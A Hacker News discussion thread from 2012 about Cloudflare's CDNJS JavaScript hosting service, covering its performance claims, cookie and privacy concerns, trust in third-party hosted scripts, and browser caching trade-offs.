Hacker News new | past | comments | ask | show | jobs | submit login
CDNJS: The Fastest Javascript Repo on the Web (cloudflare.com)
110 points by spahl on Dec 12, 2012 | hide | past | favorite | 44 comments



Low latency with a handful of pingdom monitoring nodes sitting in data centers does not necessarily translate to the "fastest repo on the web". We've tested CloudFlare since their launch using thousands of real users, and based on that testing performance tends to be on the low end compared to traditional static content CDNs. CloudFlare is more of a website proxy than CDN. By assuming full control of your website DNS, it stands out more with add-on features like security. Here is a link to some real user performance analysis I've compiled for various CDNs including CloudFlare: http://dl.dropbox.com/u/20765204/feb12-cdn-report/index.html


I have similar experience with CloudFlare. The Speed just isn't there. Most CDN perform MUCH better then them. I would love to pay to even get faster speed. But that is not the model they decided to work on. I hope they will have more speed improvement coming in soon.


this shouldn't be hosted on the cloudflare.com domain. since I am a customer every request sends my cloudflare session cookie and a bunch of Google Analytics cookies.

Not only is it 2.5KB of extra header info sent, but I don't think cloudflare should know which websites their customers have been visiting.


Yeah, that is an odd decision. Makes you wonder if the “secret” motive of CloudFlare in hosting this, other than to promote their service, is to track and analyze your visitors.

I don't see a privacy policy on CDNJS.com. I'd definitely like to know what data they collect about my visitors and what they do with it.

At least the CDN doesn't itself set any cookies.


If anything this would only work on other cloudflare users (like people who logged in to cloudflare). Most users won't have any cookies on that domain.


There's nothing to stop them setting cookies in the responses down the track though. Wait until you've got enough users, then one day just switch on your 3rd party multi-site user tracking. Or perhaps less publicly dicoverable, use browser fingerprinting and ip address correlation to do the same thing with somewhat less accuracy, but completely invisibly.

And note too, that if you're relying on a 3rd party to serve javascript your users are going to run in their browsers - if that 3rd party isn't trustworthy, you're screwed in much worse ways that cookie tracking privacy violations. Who'd notice if they started occasionally serving a modified version of jQuery which sent all form field keydowns (aka, your usernames and passwords) back to theselves?


Following the money will especially help in this situation.

How does CloudFlare make its money? It's a CDN company. I mean, that's the CORE of what they do. What is jsCDN? It's a CDN.

A simpler theory is that hosting a Javascript CDN (and demonstrating that it's even better than Google's, which is amazing), is going to provide a lot of free advertising for their product. If I use their CDN for JS and it works really well, I'm likely to go back to them for hosting other things, because using jsCDN is almost like doing a free trial of their actual CDN.

It's not even like their main form of income is in another industry that we have to make a cognitive leap to see what their ulterior motives are. It's precisely this. CDNs.


Dude, as a good cdn will set cache headers to make browsers store the items forever, without even re-validating content.

Definitely not very useable for tracking purposes, they will only know about first visit of a user. Even more if sites a and b use the same js library and version, they will only know about the first that a user visit.

Anyway is a bad technical decision not to use a different domain to ensure clients don't need to send extra cookies in the headers.


This is way too paranoid. CloudFlare are a reputable company; they're not blackhats.

I think my comment above was too paranoid, as well, but it's too late to edit. All I was suspicious of was that there might be analysis going on.


Honestly, I don't think that it is some conspiracy to track me, rather it was just a mistake. Perhaps I am not cynical enough.


Microsoft just changed their CDN url because of this: http://www.asp.net/ajaxlibrary/cdn.ashx

Though for the most part, people will not have cookies set on the domain unless they have visited the main site (i.e. they are developers).


Could you set up a CNAME on your website that points cdnjs.mycompany.com to cdnjs.cloudflare.com to solve this (for your site visitors)?

Or would that mess up cloudflare's anycast DNS?


Wouldn't the browser still send cdnjs.mycompany.com in the Host: header and break the page?


that is exactly what happens. the server isn't setup to respond to requests to the cdnjs.mycompany.com hostname and it returns a 409 error.


Ah, thanks for the info. Damn virtual hosts!


There is no cookie information (CloudFlare, Google, or otherwise) sent for requests to CDNJS resources.


the first thing I did is request backbone.min.js and open the web console to check the response time. looked at the request, saw cookies:

http://i.imgur.com/Qqzc3.jpg


In addition the reason to host this on single domain vs your own site is that the users only have to download the resource once it once for all the sites they visit.


For analytics and tag generation of libraries hosted by CDNJS, take a look at: http://www.scriptselect.com It's a weekend project I did a couple of weeks ago using d3 and backbone. You can select libraries, view selected library size, and copy the generated script tags for the libraries you've selected. Just a little tool to make using CDNJS a little more convenient. If there's enough demand, I'll add other CDNs.

Thanks to Ryan, Thomas, and CloudFlare for a very cool service!


Quick question... I thought the best part of CDN hosted js files was that they were more likely already cached on the client, not so much for the speed of delivery.

So, wouldn't it be better to go with the most popular and not the fastest?


For jQuery, maybe. But if you're using, say, Backbone, that point is moot because only CDNJS has it. The Google CDN[1] only hosts 11 libraries, CDNJS hosts over 200.

1. https://developers.google.com/speed/libraries/devguide


+1 to joshfraser - cache hits always beat requests. I remember seeing a stat about n% of top 100 sites use the google CDN for jquery, it was by far the most popular. Stick with Google for popular libraries.


Backing up wild performance-claims with a Pingdom chart?

I really don't know how anyone can take CloudFlare seriously anymore...


They say this is 'peer-reviewed' but is that all? If someone sends them a pull request for an update to a widely used but perhaps smaller library, will they review it or does it just get merged into the CDN? It seems like a good way to get access to millions of browser sessions. Is anyone in Cloudfare taking responsibility for checking that the code is coming from the authoritative repo and not joeblow/underscore.js?

https://github.com/cdnjs/cdnjs#pull-requests-steps

While Google and Microsoft are slower to update their libs, we can assume that they are downloading releases from official sources.


Contributors generally include the links to the official sources.

If not we track down the official repositories ourselves.

Once we have verified the source, we then check the diff against the submitted and official. We have always flirted with the idea of a level of automation to handle this. But your comment addresses the problem with a solution such as that so we are still manually diff checking for maximum security.


The fastest request is the one that never happens. One of the biggest benefits of using hosted libraries is that browsers cache those files locally. By sharing the same URL for your copy of jQuery with thousands of other sites, you increase your odds of getting a local browser cache hit. For popular libraries like jQuery you're probably best using Google since they have the most adoption. That said, I think CloudFlare's CDN is an interesting idea and could grow into something genuinely useful especially for less popular libraries.


The question I have [but not the answer] is:

Usually in every project there is bunch of .js [jquery, backbone, etc] and .css files. So the good practice is not only to minify and compress, but also to bundle some/all of them into several big combined files to save on extra HTTP calls.

So my question is - what is better - (1) have separate files served from such CDN [or any public CDN] or (2) combine the files and serve yourself by nginx/AWS?

Not a developer, feel free to correct any mistakes :-)


It's a great question. The answer depends on a lot of different variables like your cache hit ratio, the size & number of files, etc. I'd recommend doing a performance A/B test using JavaScript to time which one is best for your particular site. We offer a free Real User Measurement tool at Torbit (http://torbit.com) that includes the ability to do A/B tests like this.


Depends how many files you have, but for a general answer it should be 1.


cdnjs is a great public service, I've been using it for various projects for awhile and it seems consistently fast everywhere.


I've recently started using CDNJS for my projects. Thanks to Ryan, Thomas, and CloudFlare for this awesome service!

Even happier to see that you guys host CSS and images for the common libs. I will change my bootstrap css hosting over to yours soon.


We can still improve this by caching across CDNs.


You mean updating browsers to recognize the same file across different domains (e.g. md5 hash, etc)?



Shipping Google chrome with a pre-downloaded static cache for all this popular js hosting services urls+contents will probably help the most and be really easy to implement.


the reason this hasn't been done is:

a) would require all servers and browsers to be updated for what is a marginal gain

b) privacy nightmare


It would require browsers to be updated (to support checking the hash), but not servers.


a) No it wouldn't; it would be totally optional. b) Get over it; there is no difference between this and CDNs.


> Get over it; there is no difference between this and CDNs.

except the part where you track people across sites

what I am saying is not speculative. this has been proposed previously, and shot down. there is a reason why it hasn't happen.


Where would you be tracking people across sites?


If you trawl through the IETF and more recently WHATWG mailing lists you will find that every time caching comes up - either with Last-Modified or when ETag was being ratified the proposal for cross-origin caching also comes up, and is rejected.

The browser vendors just spent the past 4-5 years locking down cross-origin access in the DOM because of all the security and privacy implications that come up. Corporate profiles and ISO standards don't even accept running the code - let alone caching it (i've worked on plenty of corporate projects where you aren't allowed to even use Google hosted JS - it just won't run due to AD policies).

To give you but one example of what arises with this new vector. Say I were to go to the top 50 banking sites and take a sample of a Javascript file that is unique to each site. I would then take the hash of each file, and in a single web page include the script element with a hash of each of those files. When a visitor hits that page and the browser attempts to load each script element, if it loads it in 4ms then I know the file was in the cache and that the visitor is a customer of that bank.


Why would the banks enable hashing on their unique stuff? It would be their security flaw, not the design of the system.


Well that is just one, and as I mentioned cross-origin requests and access have been further locked down recently, not opened. With all the different versions and variants of libraries you are implementing and exposing a lot to save very little. You wouldn't even save 1% of web requests. as mentioned, this isn't a new idea, I'm just telling you the reasons why it hasn't and won't happen


is the chrome extension[1] working? was just thinking that I might start to use it if there was a browser extension that makes sure those requests stay always local. otherwise its rather slow to use any remote resource while developing a page locally.

https://github.com/cdnjs/browser-extension




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: